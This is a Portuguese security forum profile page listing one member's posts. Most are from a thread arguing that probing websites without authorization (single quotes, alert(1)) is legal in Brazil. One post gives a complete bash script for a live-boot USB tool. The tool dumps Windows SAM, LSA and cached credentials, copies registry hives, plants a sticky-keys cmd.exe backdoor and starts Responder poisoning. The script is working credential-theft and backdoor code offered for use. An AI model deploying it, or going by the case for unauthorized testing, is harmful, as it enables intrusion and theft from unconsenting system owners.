Ir para conteúdo
  • Cadastre-se

MateusP

Apoiadores
  • Total de itens

    19
  • Registro em

  • Última visita

Reputação

9 Neutral

Sobre MateusP

Últimos Visitantes

O bloco dos últimos visitantes está desativado e não está sendo visualizado por outros usuários.

  1. MateusP

    Como reportar falhas

    Não esqueci não, só digo que a aspa simples ou o alerta(1) não é uma tentativa de invasão...e o Brasil é o que me interessa, até pq não é possível extraditar brasileiro nato, que é o meu caso. Não provoque nenhum tipo de dano a ninguém, não obtenha vantagem ilícita e hack in peace...
  2. MateusP

    Como reportar falhas

    Meu deus cara, nas situações que eu descrevi o mecânico não arrombou capô nenhum, ele só viu ou ouviu qualquer coisa que indicou a ele um problema. Que parte de quando eu digo que você não pode ter nenhum tipo de acesso às partes privadas dos sistemas, não pode executar código nem nada desse tipo você não entende? E não, não é ilegal, essa conduta que eu descrevo não está tipificada em nenhum dos artigos da Lei Carolina Dieckmann. Se tem algo errado é algum moralismo esquisito seu, mas é opinião pessoal, não pensamento juridicamente válido...rs Onde, provocar um erro através da inserção de um aspa, nada mais, se encaixa na definição da conduta que está descrita aqui? onde que um alert(1) se encaixa nisso? onde saber que a versão X do software Y tem vulnerabilidades conhecidas se encaixa nisso aqui? Entenda: Inserir ' não é crime, inserir ' or 1=1-- pode ser crime... Aqui ainda menos...
  3. MateusP

    Como reportar falhas

    Por que colocar uma aspa simples num formulário ou url e ver uma mensagem de erro é anti-ético ou ilegal? Que dano foi provocado? Qual janela foi quebrada? A da falsa sensação de segurança? Nunca tentei, nem falei nada sobre dinheiro, mas também não vejo nenhum conflito ético ou legal na estratégia do @johnk3r , já que você gosta de analogias, é como se você fosse um mecânico, ouvisse um barulho esquisito no motor do carro de alguém, ou uma fumaça estranha no escapamento, avisasse isso à pessoa gratuitamente, dando uma explicação sobre qual é o provável problema e os riscos que ela corre e se oferecesse para analisar e consertar mediante pagamento.
  4. MateusP

    Como reportar falhas

    Pois é, essa é a mesma legislação que conheço, e desde que você não viole nenhum mecanismo de segurança, não cause indisponibilidade nenhuma e não tenha nenhum tipo de acesso indevido a nenhuma informação privada sua conduta não vai poder ser tipificada como crime. Por exemplo: se você faz um "pentest" sem autorização prévia e encontra uma provável injeção de SQL num app web ao passar uma aspa simples em algum parâmetro de uma requisilção e tendo como resultado um erro de unclosed quotation mark ou algo assim, onde está o crime? se encontra um XSS e explora com um alert(1) onde está o crime? se identifica no banner de algum serviço, através de um arquivo readme.html ou nos headers de respostas a requisições HTTP o uso de algum software e versão com vulnerabilidade conhecidas, onde está o crime? Por isso que, em minha interpretação, é possível fazer um pentest, ainda que superficial, sem autorização e sem cometer crime.
  5. MateusP

    Como reportar falhas

    Qual o crime? desde não haja nenhuma execução de código, acesso efetuado a sistema protegido por senha ou algo assim não vejo crime no mero teste não...se puder dar essa luz, agradeço...
  6. Pessoal, segue a gravação de uma palestra em um evento da Linux Foundation que achei sensacional e bem completa, interessante e divertida sobre linhas gerais do processo de engenharia reversa em dispositivos com Linux embarcado, tanto os aspecto de hardware quanto de software, 2h.
  7. MateusP

    Script automação pentests em redes windows.

    Pronto...agora tá no GiitHub e com direito à script para construir a imagem do 0! Só testei a partir de uma VM Debian 9,by the way.... logo mais disponibilizo também a iso pronta... https://github.com/ScarletTeam/scarlet-spectre/
  8. Estou terminando de desenvolver uma ferramenta para automatizar uma parte do pentest em redes Windows pressupondo acesso físico a uma máquina por 30s e ausência de full disk encryption. A tool é uma modificação do Debian 9 com live boot bastante silencioso e o rc.local executando o script abaixo. Gostaria muito de críticas construtivas tanto quanto ao shell script em si quanto a funcionalidades desejáveis! =) A tool será disponibilizada usando a licença GNU/GPLv2 #!/bin/bash #A opção -p no read não estava funcionando e eu não tinha paciência para descobrir o motivo exec > /dev/tty1 exec < /dev/tty1 clear cat /spectre/banner echo " -----------------------------------" echo "| Scarlet Spectre Started! |" echo " -----------------------------------" echo "Seeking and mounting NTFS partitions" mkdir /hds/ -p mkdir -p /hds/pendrive mount -t vfat -o rw,force $(blkid | grep -i "Scarlet" | cut -d':' -f1) /hds/pendrive for device in $(blkid | grep -i "NTFS" | cut -d':' -f1) ; do mounted="/hds/"$(basename $device) mkdir -p $mounted mount -t ntfs-3g -o rw,force $device $mounted if [ -d $mounted/Windows ]; then echo "Found Windows installed on $device!" system32=$mounted/Windows/System32 python /spectre/creddump7/pwdump.py $system32/config/SYSTEM $system32/config/SAM true | tee -a /hds/pendrive/credentials.log python /spectre/creddump7/cachedump.py $system32/config/SYSTEM $system32/config/SECURITY true | tee -a /hds/pendrive/credentials.log python /spectre/creddump7/lsadump.py $system32/config/SYSTEM $system32/config/SECURITY true | tee -a /hds/pendrive/credentials.log echo "Copying registry hives..." mkdir -p /hds/pendrive/hives cp $system32/config/{SYSTEM,SECURITY,SAM,SOFTWARE} /hds/pendrive/hives/ echo "Do you want to replace sethc.exe with cmd.exe (press shift 5x on logon screen for a prompt as System)? y/N: " read -n 1 -s -r temp if [ "$temp" == "y" ] || [ "$temp" == "Y" ]; then echo -e "\nReplacing sethc.exe..." cp $system32/sethc.exe $system32/sethc_.exe cp $system32/cmd.exe $system32/sethc.exe fi fi done echo "Do you want to start an NBT-DS poisoning attack? (y/N)" read -n 1 -s -r temp if [ "$temp" == "y" ] || [ "$temp" == "Y" ]; then echo "Available interfaces:" option=0 interfaces=() for interface in /sys/class/net/*; do interface="$(basename $interface)" interfaces+=($interface) echo "$option - $interface" let "option+=1" done echo "Enter the number of the network interface you want to configure: " read -n 1 -s -r selected echo "Trying to setup ${interfaces[$selected]} using DHCP..." dhclient ${interfaces[$selected]} if [ -e "/var/lib/dhcp/dhclient.leases" ] && [ "$( cat /var/lib/dhcp/dhclient.leases | grep ${interfaces[$selected]} )" != "" ]; then python /spectre/Responder/Responder.py -I ${interfaces[$selected]} else echo "Unable to setup networking using DHCP, do you want to try to read network setup data from Windows Registry? (y/N): " read -n 1 -s -r option if [ "$option" == "Y" ] || [ "$option" == "y" ]; then echo -e "\nDoing windows registry stuff"; #todo fi fi fi echo "Scarlet Spectre successfully deployed!" echo "Press R to reboot or anything for a Debian shell" read -n 1 -s -r tmp if [ "$tmp" == "r" ] ; then reboot fi clear exit 0
  9. MateusP

    Caminho para os iniciantes em Engenharia Reversa

    Não acredito que exista um mercado de trabalho de RE, em minha visão, é apenas uma habilidade ou um conjunto de habilidades utilizadas na prática de alguns profissionais, como pesquisadores, Analistas de Malware, Pentesters ou mesmo programadores "comuns" ao suportar sistemas legados.
  10. MateusP

    Torne-se um membro Apoiador!

    Pqp...divulguei em vários grupos, pedindo, quase implorando pessoalmente para a galera colaborar, nem que seja com 10 reais, vejo o vídeo do crowdfunding no canal cheio de visualizações, os posts aqui no mb, e mesmo assim só temos 66 apoiadores...estou achando difícil alcançarmos os 300. Fernando, como é que está o financeiro? será que aumentando um pouco o valor das contribuições dá para alcançar a meta?
×